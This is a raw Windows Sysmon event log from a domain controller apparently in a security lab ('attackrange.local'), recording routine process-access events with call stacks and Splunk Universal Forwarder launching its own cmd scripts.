13:36:39.281{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004042Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:39.281{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004041Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:39.281{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004040Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:39.281{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-8EE7-6005-D500-00000000A301}4912C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004039Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:39.281{59A5CD1D-8EE3-6005-B100-00000000A301}41242852C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-8EE7-6005-D500-00000000A301}4912C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7d35e7|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7cdcb9|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca4ec|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca0a3|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7c9f0d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6d7908|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6de2ee|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b29fa|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b4274|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e42dc|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ec682|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e9959|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7f31|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004038Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:39.282{59A5CD1D-8EE7-6005-D500-00000000A301}4912C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\WinEventLog.cmd" --scheme"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000004037Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:39.171{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-8EE7-6005-D400-00000000A301}4752C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004036Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:39.171{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004035Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:39.171{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004034Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:39.171{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004033Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:39.171{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004032Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:39.171{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004031Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:39.171{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004030Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:39.171{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004029Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:39.171{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004028Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:39.171{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004027Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:39.171{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-8EE7-6005-D400-00000000A301}4752C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004026Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:39.171{59A5CD1D-8EE3-6005-B100-00000000A301}41242852C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-8EE7-6005-D400-00000000A301}4752C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7d35e7|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7cdcb9|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca4ec|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca0a3|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7c9f0d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6d7908|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6de2ee|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b29fa|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b4274|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e42dc|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ec682|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e9959|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7f31|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004025Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:39.173{59A5CD1D-8EE7-6005-D400-00000000A301}4752C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\MonitorNoHandle.cmd" --scheme"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000004167Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:40.953{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-8EE8-6005-DE00-00000000A301}2188C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004166Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:40.953{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-8EE8-6005-DE00-00000000A301}2188C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004165Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:40.937{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004164Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:40.937{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004163Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:40.937{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004162Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:40.937{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004161Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:40.937{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004160Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 